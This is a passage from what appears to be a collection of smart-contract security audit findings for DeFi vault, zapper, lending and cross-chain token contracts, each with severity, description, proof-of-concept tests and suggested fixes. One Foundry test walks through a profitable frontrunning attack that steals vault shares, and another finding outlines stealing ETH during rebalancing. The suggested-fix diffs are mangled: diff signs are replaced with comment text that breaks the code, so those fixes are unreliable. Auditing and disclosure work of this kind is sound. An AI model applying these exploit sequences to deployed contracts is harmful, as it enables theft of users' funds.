amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n -Exchange rate is calculated incorrectly when the vault is closed, potentially leading to funds being stolenчhighчThe exchange ratio between shares and assets is calculated incorrectly when the vault is closed. This can cause accounting inconsistencies, funds being stolen and users being unable to redeem shares.\\nThe functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares both add `1` to the epoch cached variables `totalAssetsSnapshotForDeposit`, `totalSupplySnapshotForDeposit`, `totalAssetsSnapshotForRedeem` and `totalSupplySnapshotForRedeem`.\\nThis is incorrect because the function previewSettle, used in _settle(), already adds `1` to the variables:\\n```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n\\nThis leads to accounting inconsistencies between depositing/redeeming when a vault is closed and depositing/redeeming when a vault is open whenever the exchange ratio assets/shares is not exactly 1:1.\\nIf a share is worth more than one asset:\\nUsers that will request a deposit while the vault is closed will receive more shares than they should\\nUsers that will request a redeem while the vault is closed will receive less assets than they should\\nPOC\\nThis can be taken advantage of by an attacker by doing the following:\\nThe attacker monitors the mempool for a vault deployment.\\nBefore the vault is deployed the attacker transfers to the vault some of the vault underlying asset (donation). This increases the value of one share.\\nThe protocol team initializes the vault and adds the bootstrap liquidity.\\nUsers use the protocol normally and deposits some assets.\\nThe vault gets closed by the protocol team and the funds invested.\\nSome users request a deposit while the vault is closed.\\nThe attacker monitors the mempool to know when the vault will be open again.\\nRight before the vault is opened, the attacker performs multiple deposit requests with different accounts. For each account he deposits the minimum amount of assets required to receive 1 share.\\nThe vault opens.\\nThe attacker claims all of the deposits with every account and then redeems the shares immediately for profit.\\nThis will \"steal\" shares of other users (point 6) from the claimable silo because the protocol will give the attacker more shares than it should. The attacker will profit and some users won't be able to claim their shares.\\nAdd imports to TestClaimRedeem.t.sol:\\n```\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\n```\\n\\nand copy-paste:\\n```\\nfunction test_attackerProfitsViaRequestingDeposits() external {\\n address attacker = makeAddr(\"attacker\");\\n address protocolUsers = makeAddr(\"alice\");\\n address vaultOwner = vaultTested.owner();\\n\\n uint256 donation = 1e18 - 1;\\n uint256 protocolUsersDeposit = 10e18 + 15e18;\\n uint256 protocolTeamBootstrapDeposit = 1e18;\\n\\n IERC20 asset = IERC20(vaultTested.asset());\\n deal(address(asset), protocolUsers, protocolUsersDeposit);\\n deal(address(asset), attacker, donation);\\n deal(address(asset), vaultOwner, protocolTeamBootstrapDeposit);\\n\\n vm.prank(vaultOwner);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(protocolUsers);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n vm.prank(attacker);\\n asset.approve(address(vaultTested), type(uint256).max);\\n\\n //-> Attacker donates `1e18 - 1` assets, this can be done before the vault is even deployed\\n vm.prank(attacker);\\n asset.transfer(address(vaultTested), donation);\\n\\n //-> Protocol team bootstraps the vault with `1e18` of assets\\n vm.prank(vaultOwner);\\n vaultTested.deposit(protocolTeamBootstrapDeposit, vaultOwner);\\n \\n //-> Users deposit `10e18` of liquidity in the vault\\n vm.prank(protocolUsers);\\n vaultTested.deposit(10e18, protocolUsers);\\n\\n //-> Vault gets closed\\n vm.prank(vaultOwner);\\n vaultTested.close();\\n\\n //-> Users request deposits for `15e18` assets\\n vm.prank(protocolUsers);\\n vaultTested.requestDeposit(15e18, protocolUsers, protocolUsers, \"\");\\n\\n //-> The attacker frontruns the call to `open()` and knows that:\\n //- The current epoch cached `totalSupply` of shares will be `vaultTested.totalSupply()` + 1 + 1\\n //- The current epoch cached `totalAssets` will be 12e18 + 1 + 1\\n uint256 totalSupplyCachedOnOpen = vaultTested.totalSupply() + 1 + 1; //Current supply of shares, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 totalAssetsCachedOnOpen = vaultTested.lastSavedBalance() + 1 + 1; //Total assets passed as paremeter to `open`, plus 1 used as virtual share, plus 1 added by `_convertToAssets`\\n uint256 minToDepositToGetOneShare = totalAssetsCachedOnOpen / totalSupplyCachedOnOpen;\\n\\n //-> Attacker frontruns the call to `open()` by requesting a deposit with multiple fresh accounts\\n uint256 totalDeposited = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n deal(address(asset), attackerEOA, minToDepositToGetOneShare);\\n vm.startPrank(attackerEOA);\\n asset.approve(address(vaultTested), type(uint256).max);\\n vaultTested.requestDeposit(minToDepositToGetOneShare, attackerEOA, attackerEOA, \"\");\\n vm.stopPrank();\\n totalDeposited += minToDepositToGetOneShare;\\n }\\n\\n //->Vault gets opened again with 0 profit and 0 losses (for simplicity)\\n vm.startPrank(vaultOwner);\\n vaultTested.open(vaultTested.lastSavedBalance());\\n vm.stopPrank();\\n\\n //-> Attacker claims his deposits and withdraws them immediately for profit\\n uint256 totalRedeemed = 0;\\n for(uint256 i = 0; i < 30; i++) {\\n address attackerEOA = address(uint160(i * 31000 + 49*49)); //Random address that does not conflict with existing ones\\n vm.startPrank(attackerEOA);\\n vaultTested.claimDeposit(attackerEOA);\\n uint256 assets = vaultTested.redeem(vaultTested.balanceOf(attackerEOA), attackerEOA, attackerEOA);\\n vm.stopPrank();\\n totalRedeemed += assets;\\n }\\n\\n //->❌ Attacker is in profit\\n assertGt(totalRedeemed, totalDeposited + donation);\\n}\\n```\\nчIn the functions AsyncSynthVault::_convertToAssets and AsyncSynthVault::_convertToShares:\\nReturn `0` if `requestId == 0`\\nDon't add `1` to the two cached variables\\nIt's also a good idea to perform the initial bootstrapping deposit in the initialize function (as suggested in another finding) and require that the vault contains `0` assets when the first deposit is performed.чWhen the ratio between shares and assets is not 1:1 the protocol calculates the exchange rate between assets and shares inconsitently. This is an issue by itself and can lead to loss of funds and users not being able to claim shares. It can also be taken advantage of by an attacker to steal shares from the claimable silo.\\nNote that the \"donation\" done initially is not akin to an \"inflation\" attack because the attacker is not required to mint any share.ч```\\n// rest of code\\nuint256 totalAssetsSnapshotForDeposit = _lastSavedBalance + 1;\\nuint256 totalSupplySnapshotForDeposit = totalSupply + 1;\\n// rest of code\\nuint256 totalAssetsSnapshotForRedeem = _lastSavedBalance + pendingDeposit + 1;\\nuint256 totalSupplySnapshotForRedeem = totalSupply + sharesToMint + 1;\\n// rest of code\\n```\\n -The `_zapIn` function may unexpectedly revert due to the incorrect implementation of `_transferTokenInAndApprove`чmediumчThe `_transferTokenInAndApprove` function should approve the `router` on behalf of the VaultZapper contract. However, it checks the allowance from `msgSender` to the `router`, rather than the VaultZapper. This potentially results in the VaultZapper not approving the `router` and causing unexpected reverting.\\nThe allowance check in the `_transferTokenInAndApprove` function should verify that `address(this)` has approved sufficient amount of `tokenIn` to the `router`. However, it currently checks the allowance of `_msgSender()`, which is unnecessary and may cause transaction reverting if `_msgSender` had previously approved the `router`.\\n```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n\\nPOC\\nApply the patch to `asynchronous-vault/test/Zapper/ZapperDeposit.t.sol` to add the test case and run it with `forge test --match-test test_zapIn --ffi`.\\n```\\ndiff --git a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\nindex 9083127..ff11b56 100644\\n--- a/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous-vault/test/Zapper/ZapperDeposit.t.sol\\n@@ -17,6 // Add the line below\\n17,25 @@ contract VaultZapperDeposit is OffChainCalls {\\n zapper = new VaultZapper();\\n }\\n\\n// Add the line below\\n function test_zapIn() public {\\n// Add the line below\\n Swap memory params =\\n// Add the line below\\n Swap(_router, _USDC, _WSTETH, 1500 * 1e6, 1, address(0), 20);\\n// Add the line below\\n _setUpVaultAndZapper(_WSTETH);\\n// Add the line below\\n\\n// Add the line below\\n IERC4626 vault = _vault;\\n// Add the line below\\n bytes memory swapData =\\n// Add the line below\\n _getSwapData(address(zapper), address(zapper), params);\\n// Add the line below\\n\\n// Add the line below\\n _getTokenIn(params);\\n// Add the line below\\n\\n// Add the line below\\n // If the msgSender() happend to approve the SwapRouter before, then the zap will always revert\\n// Add the line below\\n IERC20(params.tokenIn).approve(address(params.router), params.amount);\\n// Add the line below\\n zapper.zapAndDeposit(\\n// Add the line below\\n params.tokenIn, vault, params.router, params.amount, swapData\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n //// test_zapAndDeposit ////\\n function test_zapAndDepositUsdcWSTETH() public {\\n Swap memory usdcToWstEth =\\n```\\n\\nResult:\\n```\\nRan 1 test for test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. Reason: SwapFailed(\"\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\")] test_zapIn() (gas: 4948462)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 20.84s (18.74s CPU time)\\n\\nRan 1 test suite in 22.40s (20.84s CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)\\n\\nFailing tests:\\nEncountered 1 failing test in test/Zapper/ZapperDeposit.t.sol:VaultZapperDeposit\\n[FAIL. Reason: SwapFailed(\"\\u{8}�y�\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 \\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0(ERC20: transfer amount exceeds allowance\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\")] test_zapIn() (gas: 4948462)\\n```\\nчFix the issue:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\nindex 9943535..9cf6df9 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/asynchronous// Remove the line below\\nvault/src/VaultZapper.sol\\n@@ // Remove the line below\\n165,7 // Add the line below\\n165,7 @@ contract VaultZapper is Ownable2Step, Pausable {\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n// Remove the line below\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n// Add the line below\\n if (tokenIn.allowance(address(this), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\nчThis issue could lead to transaction reverting when users interact with the contract normally, thereby affecting the contract's regular functionality.ч```\\n function _transferTokenInAndApprove(\\n address router,\\n IERC20 tokenIn,\\n uint256 amount\\n )\\n internal\\n {\\n tokenIn.safeTransferFrom(_msgSender(), address(this), amount);\\n//@ The check of allowance is useless, we should check the allowance from address(this) rather than the msgSender\\n if (tokenIn.allowance(_msgSender(), router) < amount) {\\n tokenIn.forceApprove(router, amount);\\n }\\n }\\n```\\n -Unupdated totalBorrow After BigBang LiquidationчhighчDuring the liquidation process, BigBang only reduces the user's `userBorrowPart[user]`, but fails to update the global `totalBorrow`. Consequently, all subsequent debt calculations are incorrect.\\nCurrently, the implementation relies on the `BBLiquidation._updateBorrowAndCollateralShare()` method to calculate user debt repayment and collateral collection. The code snippet is as follows:\\n```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * _exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n\\nThe methods mentioned above update the user-specific variables `userBorrowPart[user]` and `userCollateralShare[user]` within the `_updateBorrowAndCollateralShare()` method. Additionally, the global variable `totalCollateralShare` is updated within the `_liquidateUser()` method.\\nHowever, there's another crucial global variable, `totalBorrow`, which remains unaltered throughout the entire liquidation process.\\nFailure to update `totalBorrow` during liquidation will result in incorrect subsequent loan-related calculations.\\nNote: SGL Liquidation has the same issuesч```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n// Remove the line below\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n// Add the line below\\n (uint256 borrowAmount,uint256 borrowPart, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare // Remove the line below\\n collateralShare : 0;\\n// Add the line below\\n totalBorrow.elastic // Remove the line below\\n= borrowAmount.toUint128();\\n// Add the line below\\n totalBorrow.base // Remove the line below\\n= borrowPart.toUint128();\\n```\\nчThe lack of an update to `totalBorrow` during liquidation leads to inaccuracies in subsequent loan-related calculations. For instance, this affects interest accumulation and the amount of interest due.ч```\\n function _liquidateUser(\\n address user,\\n uint256 maxBorrowPart,\\n IMarketLiquidatorReceiver _liquidatorReceiver,\\n bytes calldata _liquidatorReceiverData,\\n uint256 _exchangeRate,\\n uint256 minLiquidationBonus\\n ) private {\\n uint256 callerReward = _getCallerReward(user, _exchangeRate);\\n\\n (uint256 borrowAmount,, uint256 collateralShare) =\\n _updateBorrowAndCollateralShare(user, maxBorrowPart, minLiquidationBonus, _exchangeRate);\\n totalCollateralShare = totalCollateralShare > collateralShare ? totalCollateralShare - collateralShare : 0;\\n uint256 borrowShare = yieldBox.toShare(assetId, borrowAmount, true);\\n\\n (uint256 returnedShare,) =\\n _swapCollateralWithAsset(collateralShare, _liquidatorReceiver, _liquidatorReceiverData);\\n if (returnedShare < borrowShare) revert AmountNotValid();\\n\\n (uint256 feeShare, uint256 callerShare) = _extractLiquidationFees(returnedShare, borrowShare, callerReward);\\n\\n IUsdo(address(asset)).burn(address(this), borrowAmount);\\n\\n address[] memory _users = new address[](1);\\n _users[0] = user;\\n emit Liquidated(msg.sender, _users, callerShare, feeShare, borrowAmount, collateralShare);\\n }\\n\\n function _updateBorrowAndCollateralShare(\\n address user,\\n uint256 maxBorrowPart,\\n uint256 minLiquidationBonus, // min liquidation bonus to accept (default 0)\\n uint256 _exchangeRate\\n ) private returns (uint256 borrowAmount, uint256 borrowPart, uint256 collateralShare) {\\n if (_exchangeRate == 0) revert ExchangeRateNotValid();\\n\\n // get collateral amount in asset's value\\n uint256 collateralPartInAsset = (\\n yieldBox.toAmount(collateralId, userCollateralShare[user], false) * EXCHANGE_RATE_PRECISION\\n ) / _exchangeRate;\\n\\n // compute closing factor (liquidatable amount)\\n uint256 borrowPartWithBonus =\\n computeClosingFactor(userBorrowPart[user], collateralPartInAsset, FEE_PRECISION_DECIMALS);\\n\\n // limit liquidable amount before bonus to the current debt\\n uint256 userTotalBorrowAmount = totalBorrow.toElastic(userBorrowPart[user], true);\\n borrowPartWithBonus = borrowPartWithBonus > userTotalBorrowAmount ? userTotalBorrowAmount : borrowPartWithBonus;\\n\\n // check the amount to be repaid versus liquidator supplied limit\\n borrowPartWithBonus = borrowPartWithBonus > maxBorrowPart ? maxBorrowPart : borrowPartWithBonus;\\n borrowAmount = borrowPartWithBonus;\\n\\n // compute part units, preventing rounding dust when liquidation is full\\n borrowPart = borrowAmount == userTotalBorrowAmount\\n ? userBorrowPart[user]\\n : totalBorrow.toBase(borrowPartWithBonus, false);\\n if (borrowPart == 0) revert Solvent();\\n\\n if (liquidationBonusAmount > 0) {\\n borrowPartWithBonus = borrowPartWithBonus + (borrowPartWithBonus * liquidationBonusAmount) / FEE_PRECISION;\\n }\\n\\n if (collateralPartInAsset < borrowPartWithBonus) {\\n if (collateralPartInAsset <= userTotalBorrowAmount) {\\n revert BadDebt();\\n }\\n // If current debt is covered by collateral fully\\n // then there is some liquidation bonus,\\n // so liquidation can proceed if liquidator's minimum is met\\n if (minLiquidationBonus > 0) {\\n // `collateralPartInAsset > borrowAmount` as `borrowAmount <= userTotalBorrowAmount`\\n uint256 effectiveBonus = ((collateralPartInAsset - borrowAmount) * FEE_PRECISION) / borrowAmount;\\n if (effectiveBonus < minLiquidationBonus) {\\n revert InsufficientLiquidationBonus();\\n }\\n collateralShare = userCollateralShare[user];\\n } else {\\n revert InsufficientLiquidationBonus();\\n }\\n } else {\\n collateralShare =\\n yieldBox.toShare(collateralId, (borrowPartWithBonus * _exchangeRate) / EXCHANGE_RATE_PRECISION, false);\\n if (collateralShare > userCollateralShare[user]) {\\n revert NotEnoughCollateral();\\n }\\n }\\n\\n userBorrowPart[user] -= borrowPart;\\n userCollateralShare[user] -= collateralShare;\\n }\\n```\\n -`_computeClosingFactor` function will return incorrect values, lower than needed, because it uses `collateralizationRate` to calculate the denominatorчhighч`_computeClosingFactor` is used to calculate the required borrow amount that should be liquidated to make the user's position solvent. However, this function uses `collateralizationRate` (defaulting to 75%) to calculate the liquidated amount, while the threshold to be liquidatable is `liquidationCollateralizationRate` (defaulting to 80%). Therefore, it will return incorrect liquidated amount.\\nIn `_computeClosingFactor` of Market contract:\\n```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n\\nA user will be able to be liquidated if their ratio between borrow and collateral value exceeds `liquidationCollateralizationRate` (see `_isSolvent()` function). However, `_computeClosingFactor` uses `collateralizationRate` (defaulting to 75%) to calculate the denominator for the needed liquidate amount, while the numerator is calculated by using `liquidationCollateralizationRate` (80% in default). These variables were initialized in `_initCoreStorage()`.\\nIn the above calculation of `_computeClosingFactor` function, in default: `_liquidationMultiplier` = 12%, `numerator` = `borrowPart` - `liquidationStartsAt` = borrowAmount - 80% * collateralToAssetAmount => x will be: `numerator` / (1 - 75% * 112%) = `numerator` / 16%\\nHowever, during a partial liquidation of BigBang or Singularity, the actual collateral bonus is `liquidationBonusAmount`, defaulting to 10%. (code snippet). Therefore, the minimum liquidated amount required to make user solvent (unable to be liquidated again) is: numerator / (1 - 80% * 110%) = numerator / 12%.\\nAs result, `computeClosingFactor()` function will return a lower liquidated amount than needed to make user solvent, even when that function attempts to over-liquidate with `_liquidationMultiplier` > `liquidationBonusAmount`.чUse `liquidationCollateralizationRate` instead of `collateralizationRate` to calculate the denominator in `_computeClosingFactor`чThis issue will result in the user still being liquidatable after a partial liquidation because it liquidates a lower amount than needed. Therefore, the user will never be solvent again after they are undercollateralized until their position is fully liquidated. This may lead to the user being liquidated more than expected, or experiencing a loss of funds in attempting to recover their position.ч```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n -All ETH can be stolen during rebalancing for `mTOFTs` that hold nativeчhighчRebalancing of ETH transfers the ETH to the destination `mTOFT` without calling `sgRecieve` which leaves the ETH hanging inside the `mTOFT` contract. This can be exploited to steal all the ETH.\\nRebalancing of `mTOFTs` that hold native tokens is done through the `routerETH` contract inside the `Balancer.sol` contract. Here is the code snippet for the `routerETH` contract:\\n```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n\\nThe expected behaviour is ETH being received on the destination chain whereby `sgReceive` is called and ETH is deposited inside the `TOFTVault`.\\n```\\n## mTOFT.sol\\n\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n IERC20(erc20).safeTransfer(address(vault), amountLD);\\n }\\n }\\n```\\n\\nBy taking a closer look at the logic inside the `routerETH` contract we can see that the transfer is called with an empty payload:\\n```\\n // compose stargate to swap ETH on the source to ETH on the destination\\n function swapETH(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n uint256 _amountLD, // the amount, in Local Decimals, to be swapped\\n uint256 _minAmountLD // the minimum amount accepted out on destination\\n ) external payable {\\n require(msg.value > _amountLD, \"Stargate: msg.value must be > _amountLD\");\\n\\n // wrap the ETH into WETH\\n IStargateEthVault(stargateEthVault).deposit{value: _amountLD}();\\n IStargateEthVault(stargateEthVault).approve(address(stargateRouter), _amountLD);\\n\\n // messageFee is the remainder of the msg.value after wrap\\n uint256 messageFee = msg.value - _amountLD;\\n\\n // compose a stargate swap() using the WETH that was just wrapped\\n stargateRouter.swap{value: messageFee}(\\n _dstChainId, // destination Stargate chainId\\n poolId, // WETH Stargate poolId on source\\n poolId, // WETH Stargate poolId on destination\\n _refundAddress, // message refund address if overpaid\\n _amountLD, // the amount in Local Decimals to swap()\\n _minAmountLD, // the minimum amount swap()er would allow to get out (ie: slippage)\\n IStargateRouter.lzTxObj(0, 0, \"0x\"),\\n _toAddress, // address on destination to send to\\n bytes(\"\") // empty payload, since sending to EOA\\n );\\n }\\n```\\n\\nNotice the comment:\\nempty payload, since sending to EOA\\nSo `routerETH` after depositing ETH in `StargateEthVault` calls the regular `StargateRouter` but with an empty payload.\\nNext, let's see how the receiving logic works.\\nAs Stargate is just another application built on top of LayerZero the receiving starts inside the `Bridge::lzReceive` function. As the type of transfer is `TYPE_SWAP_REMOTE` the `router::swapRemote` is called:\\n```\\nfunction lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n) external override {\\n\\n\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n address toAddress;\\n assembly {\\n toAddress := mload(add(to, 20))\\n }\\n router.creditChainPath(_srcChainId, srcPoolId, dstPoolId, c);\\n router.swapRemote(_srcChainId, _srcAddress, _nonce, srcPoolId, dstPoolId, dstGasForCall, toAddress, s, payload);\\n```\\n\\n`Router:swapRemote` has two responsibilities:\\nFirst it calls `pool::swapRemote` that transfers the actual tokens to the destination address. In this case this is the `mTOFT` contract.\\nSecond it will call `IStargateReceiver(mTOFTAddress)::sgReceive` but only if the payload is not empty.\\n```\\n function _swapRemote(\\n uint16 _srcChainId,\\n bytes memory 